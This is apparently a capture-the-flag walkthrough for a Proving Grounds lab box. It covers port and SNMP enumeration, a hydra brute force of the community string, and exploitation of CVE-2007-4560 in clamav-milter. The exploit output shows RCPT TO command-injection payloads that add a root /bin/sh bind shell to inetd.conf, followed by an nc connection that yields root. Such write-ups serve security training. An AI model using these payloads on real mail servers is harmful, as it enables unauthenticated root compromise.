PG - ClamAV
Discovers SNMP is running, exploiting CVE-2007-4560 in ClamAV's clamav-milter to achieve unauthenticated remote code execution as root
Recon
nmap discovered several ports like SSH, SMTP, HTTP and SMB.
nmap -Pn -sV -sC -vvv "$TARGET"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 303ea4135f9a32c08e46eb26b35eee6d (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3ww6ryEkjNnb74KCooHOjy
eGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1I
ZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznf
C3fRtmj2e/L9chzg=
| 1024 afa2493ed8f226124aa0b5ee6276b018 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH/fjz9FK4HQPC7WtXY9Eg
W4IMB+pzX2KZxK2PF0=
25/tcp open smtp? syn-ack ttl 61
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http syn-ack ttl 61 Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Ph33r
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux syn-ack ttl 61 Linux SNMP multiplexer
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh syn-ack ttl 61 OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 303ea4135f9a32c08e46eb26b35eee6d (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3ww6ryEkjNnb74KCooHOjy
eGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1I
ZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznf
C3fRtmj2e/L9chzg=
| 1024 afa2493ed8f226124aa0b5ee6276b018 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH/fjz9FK4HQPC7WtXY9Eg
W4IMB+pzX2KZxK2PF0=
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Based on the OpenSSH versions, the host is likely running Debian, which means this is linux machine.
There is Null Session on SMB but unable to connect to the shares. HTTP webpage shows bunch of 1’s and 0’s.
It is a binary number and I use CyberChef to convert it from binary and got the below string.
1
ifyoudontpwnmeuran00b
Interesting.
Let’s scan UDP port as this is a very important part of recon especially in OSCP.
sudo nmap -Pn -sU -sV -vvv -p 161,162 --script=snmp-netstat,snmp-processes "$TARGET"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
161/udp open snmp udp-response ttl 61 SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
| snmp-info:
| enterprise: U.C. Davis, ECE Dept. Tom
| engineIDFormat: unknown
| engineIDData: 9e325869f30c7749
| snmpEngineBoots: 60
|_ snmpEngineTime: 2h53m41s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| eth0
| IP address: 192.168.240.42 Netmask: 255.255.255.0
|_ Type: ethernetCsmacd Speed: 100 Mbps
| snmp-netstat:
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:80 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:199 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 42.240.168.192:137 *:*
|_ UDP 42.240.168.192:138 *:*
| snmp-processes:
| 1:
| Name: init
| Path: init [2]
| 2:
| Name: ksoftirqd/0
| Path: ksoftirqd/0
| 3:
| Name: events/0
| Path: events/0
| 4:
| Name: khelper
| Path: khelper
| 5:
| Name: kacpid
| Path: kacpid
| 99:
| Name: kblockd/0
| Path: kblockd/0
| 109:
| Name: pdflush
| Path: pdflush
| 110:
| Name: pdflush
| Path: pdflush
| 111:
| Name: kswapd0
| Path: kswapd0
| 112:
| Name: aio/0
| Path: aio/0
| 255:
| Name: kseriod
| Path: kseriod
| 276:
| Name: scsi_eh_0
| Path: scsi_eh_0
| 284:
| Name: khubd
| Path: khubd
| 348:
| Name: shpchpd_event
| Path: shpchpd_event
| 380:
| Name: kjournald
| Path: kjournald
| 935:
| Name: vmmemctl
| Path: vmmemctl
| 1178:
| Name: vmtoolsd
| Path: /usr/sbin/vmtoolsd
| 3770:
| Name: syslogd
| Path: /sbin/syslogd
| 3773:
| Name: klogd
| Path: /sbin/klogd
| 3777:
| Name: clamd
| Path: /usr/local/sbin/clamd
| 3779:
| Name: clamav-milter
| Path: /usr/local/sbin/clamav-milter
| Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
...[snip]...
| snmp-sysdescr: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
|_ System uptime: 2h53m40.84s (1042084 timeticks)
1105/udp open|filtered ftranhc no-response
Service Info: Hosts: 0XBABE, 0xbabe.local
There is SNMP running on port 161!
Furthermore, there is one interesting process 3779 that is running clamav-milter
1
2
3
4
| 3779:
| Name: clamav-milter
| Path: /usr/local/sbin/clamav-milter
| Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
I’ll try to use hydra to bruteforce for any community string.
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt "$TARGET" snmp
1
[161][snmp] host: 192.168.240.42 password: public
I got the SNMP string public.
I then use snmp-check with public string to enumerate for any new info.
snmp-check -c public "$TARGET"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.240.42:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 192.168.240.42
Hostname : 0xbabe.local
Description : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
Contact : Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)
Location : Unknown (configure /etc/snmp/snmpd.local.conf)
Uptime snmp : 03:06:35.00
Uptime system : 03:05:57.00
System date : 2024-12-23 05:21:53.0
[*] Network information:
...[snip]...
[*] Processes:
Id Status Name Path Parameters
1 runnable init init [2]
2 runnable ksoftirqd/0 ksoftirqd/0
3 runnable events/0 events/0
4 runnable khelper khelper
5 runnable kacpid kacpid
99 runnable kblockd/0 kblockd/0
109 runnable pdflush pdflush
110 runnable pdflush pdflush
111 runnable kswapd0 kswapd0
112 runnable aio/0 aio/0
255 runnable kseriod kseriod
276 runnable scsi_eh_0 scsi_eh_0
284 runnable khubd khubd
348 runnable shpchpd_event shpchpd_event
380 runnable kjournald kjournald
935 runnable vmmemctl vmmemctl
1178 runnable vmtoolsd /usr/sbin/vmtoolsd
3770 running syslogd /sbin/syslogd
3773 runnable klogd /sbin/klogd
3777 runnable clamd /usr/local/sbin/clamd
3779 runnable clamav-milter /usr/local/sbin/clamav-milter --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
...[snip]...
Can see the process 3779 is running clamav-milter with black-hole-mode, same result as nmap scan earlier.
Exploitation
I’ll find the exploit.
Google search result
Found out that it is affected by CVE-2007-4560, a vulnerability in ClamAV’s clamav-milter when configured with --black-hole-mode. In this mode, recipient addresses are passed unsanitized to popen(), allowing an attacker to inject shell metacharacters via the RCPT TO field in an SMTP transaction, leading to unauthenticated remote command execution on the mail server.
I’ll search for any PoC related to the CVE and found this from Github that is working relatively well.
git clone https://github.com/Sic4rio/-Sendmail-with-clamav-milter-0.91.2---Remote-Command-Execution
cd -Sendmail-with-clamav-milter-0.91.2---Remote-Command-Execution
Give execute permission to the exploit chmod +x exploit.py
I’ll run the exploit.
python exploit.py "$TARGET"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
________ ___ _ __ [6/45632]
/ ____/ /___ _____ ___ / | | / /
/ / / / __ `/ __ `__ \/ /| | | / /
/ /___/ / /_/ / / / / / / ___ | |/ /
\____/_/\__,_/_/ /_/ /_/_/ |_|___/
_.-''|''-._
.-' | `-.
.'\ | /`.
.' \ | / `.
\ \ | / /
`\ \ | / /'
`\ \ | / /'
`\ \ | / /'
23 _.-`\ \ | / /'-._
{_____`\|//'_____}
`-'
Clam AntiVirus 'clamav-milter' Remote Code Execution Exploit
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Remix (C) 2023 SICARIO
Attacking 192.168.114.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Tue, 5 Aug 2025 14:48:05 -0400; (No UCE/UBE) logging access from: [192.168.45.156](TEMP)-[192.168.45.156]
250-localhost.localdomain Hello [192.168.45.156], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"@localhost>... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart"@localhost>... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 575Im5AF004325 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
Now I’ll be able to connect to target machine’s bind shell and gain RCE as root.
nc -nv "$TARGET" 31337
May need to run the exploit again if unable to connect to the bind shell
1
2
3
4
5
6
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.114.42:31337.
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)